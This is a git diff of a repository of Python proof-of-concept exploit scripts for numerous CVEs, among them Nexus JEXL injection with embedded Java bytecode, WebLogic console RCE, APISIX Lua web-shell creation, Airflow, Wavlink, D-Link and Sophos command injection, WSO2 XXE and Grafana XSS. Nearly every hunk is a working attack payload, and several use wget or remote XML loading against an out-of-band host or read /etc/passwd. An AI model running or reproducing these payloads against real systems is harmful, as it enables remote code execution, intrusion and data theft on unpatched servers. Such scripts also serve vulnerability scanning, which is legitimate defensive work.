index 3eb6c7564..d19c96522 100644
--- a/2019/CVE-2019-7238/poc/pocsploit/CVE-2019-7238.py
+++ b/2019/CVE-2019-7238/poc/pocsploit/CVE-2019-7238.py
@@ -1,4 +1,5 @@
 import requests
+import re
 
 
 # Vuln Base Info
@@ -38,9 +39,9 @@ def poc(url):
 
         path = """/service/extdirect"""
         method = "POST"
-        data = """{"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n    y,\n   'Exploit.Test234',\n    z.getBytes('latin1'),    0,\n    3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}"""
+        data = {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n    y,\n   'Exploit.Test234',\n    z.getBytes('latin1'),    0,\n    3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}
         headers = {'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if (re.search(r"""root:.*:0:0:""",resp0.text)) and (resp0.status_code == 200):
             result["success"] = True
diff --git a/2019/CVE-2019-9733/poc/pocsploit/CVE-2019-9733.py b/2019/CVE-2019-9733/poc/pocsploit/CVE-2019-9733.py
index b67c384b7..ab8558d41 100644
--- a/2019/CVE-2019-9733/poc/pocsploit/CVE-2019-9733.py
+++ b/2019/CVE-2019-9733/poc/pocsploit/CVE-2019-9733.py
@@ -1,3 +1,4 @@
+import json
 import requests
 
 
@@ -39,9 +40,9 @@ def poc(url):
 
         path = """/artifactory/ui/auth/login?_spring_security_remember_me=false"""
         method = "POST"
-        data = """{"user":"access-admin","password":"password","type":"login"}"""
+        data = {"user":"access-admin","password":"password","type":"login"}
         headers = {'Accept': 'application/json, text/plain, */*', 'X-Requested-With': 'artUI', 'X-Forwarded-For': '127.0.0.1', 'Request-Agent': 'artifactoryUI', 'Content-Type': 'application/json'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if ("""username": "access-admin""" in resp0.text) and (resp0.status_code == 200):
             result["success"] = True
diff --git a/2020/CVE-2020-11110/poc/pocsploit/CVE-2020-11110.py b/2020/CVE-2020-11110/poc/pocsploit/CVE-2020-11110.py
index 473c36718..7e2946ba9 100644
--- a/2020/CVE-2020-11110/poc/pocsploit/CVE-2020-11110.py
+++ b/2020/CVE-2020-11110/poc/pocsploit/CVE-2020-11110.py
@@ -38,9 +38,9 @@ def poc(url):
 
         path = """/api/snapshots"""
         method = "POST"
-        data = """{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}"""
+        data = {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":True,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":True}]},"editable":True,"gnetId":None,"graphTooltip":0,"id":None,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":None,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":None,"version":0},"name":"Dashboard","expires":0}
         headers = {'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'en-US,en;q=0.5', 'content-type': 'application/json', 'Connection': 'close'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if (resp0.status_code == 200) and ("""application/json""" in str(resp0.headers)) and ("""deleteKey":""" in resp0.text and """deleteUrl":""" in resp0.text):
             result["success"] = True
diff --git a/2020/CVE-2020-11978/poc/pocsploit/CVE-2020-11978.py b/2020/CVE-2020-11978/poc/pocsploit/CVE-2020-11978.py
index 8b67b4107..0ff7c1e13 100644
--- a/2020/CVE-2020-11978/poc/pocsploit/CVE-2020-11978.py
+++ b/2020/CVE-2020-11978/poc/pocsploit/CVE-2020-11978.py
@@ -40,21 +40,19 @@ def poc(url):
 
         path = """/api/experimental/test"""
         method = "GET"
-        data = """"""
         headers = {'Accept': '*/*'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         path = """/api/experimental/dags/example_trigger_target_dag/paused/false"""
         method = "GET"
-        data = """"""
         headers = {'Accept': '*/*'}
-        resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp1 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         path = """/api/experimental/dags/example_trigger_target_dag/dag_runs"""
         method = "POST"
-        data = """{"conf": {"message": "\"; touch test #"}}"""
+        data = {"conf": {"message": "\"; touch test #"}}
         headers = {'Accept': '*/*', 'Content-Type': 'application/json'}
-        resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp2 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         tmp = re.findall(r'"execution_date":"([0-9-A-Z:+]+)"', resp2.text)
         if tmp:
@@ -65,11 +63,10 @@ def poc(url):
 
         path = """/api/experimental/dags/example_trigger_target_dag/dag_runs/{exec_date}/tasks/bash_task""".format(exec_date=exec_date)
         method = "GET"
-        data = """"""
         headers = {'Accept': '*/*'}
-        resp3 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp3 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
-        if '"operator":"BashOperator"' in resp3.text and "application/json" in str(resp.headers):
+        if '"operator":"BashOperator"' in resp3.text and "application/json" in str(resp3.headers):
             result["success"] = True
             result["info"] = info()
             result["payload"] = url+path
diff --git a/2020/CVE-2020-13117/poc/pocsploit/CVE-2020-13117.py b/2020/CVE-2020-13117/poc/pocsploit/CVE-2020-13117.py
index d57d98d0c..130f9bea0 100644
--- a/2020/CVE-2020-13117/poc/pocsploit/CVE-2020-13117.py
+++ b/2020/CVE-2020-13117/poc/pocsploit/CVE-2020-13117.py
@@ -41,7 +41,7 @@ def poc(url):
 
         path = """/cgi-bin/login.cgi"""
         method = "POST"
-        data = """newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2Foob_domain%3B%60%3B%23&password=asd&lang_select=en"""
+        data = """newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{oob_domain}%3B%60%3B%23&password=asd&lang_select=en""".format(oob_domain=oob_domain)
         headers = {'Origin': 'http://{{Hostname}}', 'Content-Type': 'application/x-www-form-urlencoded', 'Accept-Encoding': 'gzip, deflate'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2020/CVE-2020-13945/poc/pocsploit/CVE-2020-13945.py b/2020/CVE-2020-13945/poc/pocsploit/CVE-2020-13945.py
index 86d8dd62d..365b77209 100644
--- a/2020/CVE-2020-13945/poc/pocsploit/CVE-2020-13945.py
+++ b/2020/CVE-2020-13945/poc/pocsploit/CVE-2020-13945.py
@@ -1,4 +1,6 @@
 import requests
+import random
+import string
 
 
 # Vuln Base Info
@@ -33,29 +35,29 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    randstr = gen_random_str(10)
     try:
         url = format_url(url)
 
         path = """/apisix/admin/routes"""
         method = "POST"
-        data = """{
-  "uri":"/{{randstr}}",
-  "script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f =        assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
-  "upstream":{
-    "type":"roundrobin",
-    "nodes":{
-      "example.com:80":1
-    }
-  }
-}"""
+        data = {
+            "uri":"/{randstr}".format(randstr=randstr),
+            "script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f =        assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
+            "upstream":{
+                "type":"roundrobin",
+                "nodes":{
+                "example.com:80":1
+                }
+            }
+        }
         headers = {'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'Content-Type': 'application/json'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
-        path = """/{{randstr}}?cmd=id"""
+        path = """/{randstr}?cmd=id""".format(randstr=randstr)
         method = "GET"
-        data = """"""
         headers = {}
-        resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp1 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if ("""action":"create""" in resp1.text and """script":""" in resp1.text and """node":""" in resp1.text) and (resp1.status_code == 201):
             result["success"] = True
@@ -80,4 +82,7 @@ def format_url(url):
         url = 'http://' + url
     url = url.rstrip('/')
 
-    return url
\ No newline at end of file
+    return url
+
+def gen_random_str(length):
+    return ''.join(random.choice(string.ascii_letters) for _ in range(length))
\ No newline at end of file
diff --git a/2020/CVE-2020-14882/poc/pocsploit/CVE-2020-14882.py b/2020/CVE-2020-14882/poc/pocsploit/CVE-2020-14882.py
index 75e10474d..40bb6ad65 100644
--- a/2020/CVE-2020-14882/poc/pocsploit/CVE-2020-14882.py
+++ b/2020/CVE-2020-14882/poc/pocsploit/CVE-2020-14882.py
@@ -45,7 +45,7 @@ def poc(url):
 
         path = """/console/images/%252e%252e%252fconsole.portal"""
         method = "POST"
-        data = """_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://oob_domain")"""
+        data = """_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://{oob_domain}")""".format(oob_domain=oob_domain)
         headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2020/CVE-2020-18268/poc/pocsploit/CVE-2020-18268.py b/2020/CVE-2020-18268/poc/pocsploit/CVE-2020-18268.py
index 963e312cd..40d0cebe2 100644
--- a/2020/CVE-2020-18268/poc/pocsploit/CVE-2020-18268.py
+++ b/2020/CVE-2020-18268/poc/pocsploit/CVE-2020-18268.py
@@ -1,4 +1,5 @@
 import requests
+import hashlib
 
 
 # Vuln Base Info
@@ -33,6 +34,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -40,7 +43,7 @@ def poc(url):
 
         path = """/zb_system/cmd.php?act=verify"""
         method = "POST"
-        data = """btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0"""
+        data = """btnPost=Log+In&username={username}&password={md5_password}&savedate=0""".format(username=username, md5_password=MD5(password))
         headers = {'Content-Length': '81', 'Content-Type': 'application/x-www-form-urlencoded', 'Connection': 'close'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
@@ -73,4 +76,9 @@ def format_url(url):
         url = 'http://' + url
     url = url.rstrip('/')
 
-    return url
\ No newline at end of file
+    return url
+
+def MD5(str):
+    m = hashlib.md5()
+    m.update(str.encode('utf-8'))
+    return m.hexdigest()
\ No newline at end of file
diff --git a/2020/CVE-2020-24589/poc/pocsploit/CVE-2020-24589.py b/2020/CVE-2020-24589/poc/pocsploit/CVE-2020-24589.py
index 753d0802c..7d4e12961 100644
--- a/2020/CVE-2020-24589/poc/pocsploit/CVE-2020-24589.py
+++ b/2020/CVE-2020-24589/poc/pocsploit/CVE-2020-24589.py
@@ -41,7 +41,7 @@ def poc(url):
 
         path = """/carbon/generic/save_artifact_ajaxprocessor.jsp"""
         method = "POST"
-        data = """payload=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+"http%3a//oob_domain">%25xxe%3b]>"""
+        data = """payload=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+a+[+<!ENTITY+%25+xxe+SYSTEM+"http%3a//{oob_domain}">%25xxe%3b]>""".format(oob_domain=oob_domain)
         headers = {'Content-Type': 'application/x-www-form-urlencoded'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2020/CVE-2020-25223/poc/pocsploit/CVE-2020-25223.py b/2020/CVE-2020-25223/poc/pocsploit/CVE-2020-25223.py
index c4d52e93a..7c6f177a1 100644
--- a/2020/CVE-2020-25223/poc/pocsploit/CVE-2020-25223.py
+++ b/2020/CVE-2020-25223/poc/pocsploit/CVE-2020-25223.py
@@ -41,7 +41,7 @@ def poc(url):
 
         path = """/var"""
         method = "POST"
-        data = """{"objs": [{"FID": "init"}], "SID": "|wget http://oob_domain|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}"""
+        data = """{"objs": [{"FID": "init"}], "SID": "|wget http://{oob_domain}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}""".format(oob_domain=oob_domain)
         headers = {'Accept': 'text/javascript, text/html, application/xml, text/xml, */*', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'X-Requested-With': 'XMLHttpRequest', 'X-Prototype-Version': '1.5.1.1', 'Content-Type': 'application/json; charset=UTF-8', 'Connection': 'close', 'Sec-Fetch-Dest': 'empty', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Site': 'same-origin'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2020/CVE-2020-25506/poc/pocsploit/CVE-2020-25506.py b/2020/CVE-2020-25506/poc/pocsploit/CVE-2020-25506.py
index 9bfd65f17..3d04164ef 100644
--- a/2020/CVE-2020-25506/poc/pocsploit/CVE-2020-25506.py
+++ b/2020/CVE-2020-25506/poc/pocsploit/CVE-2020-25506.py
@@ -42,11 +42,11 @@ def poc(url):
 
         path = """/cgi-bin/system_mgr.cgi?"""
         method = "POST"
-        data = """C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://oob_domain`"""
+        data = """C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{oob_domain}`""".format(oob_domain=oob_domain)
         headers = {'Accept': '*/*'}
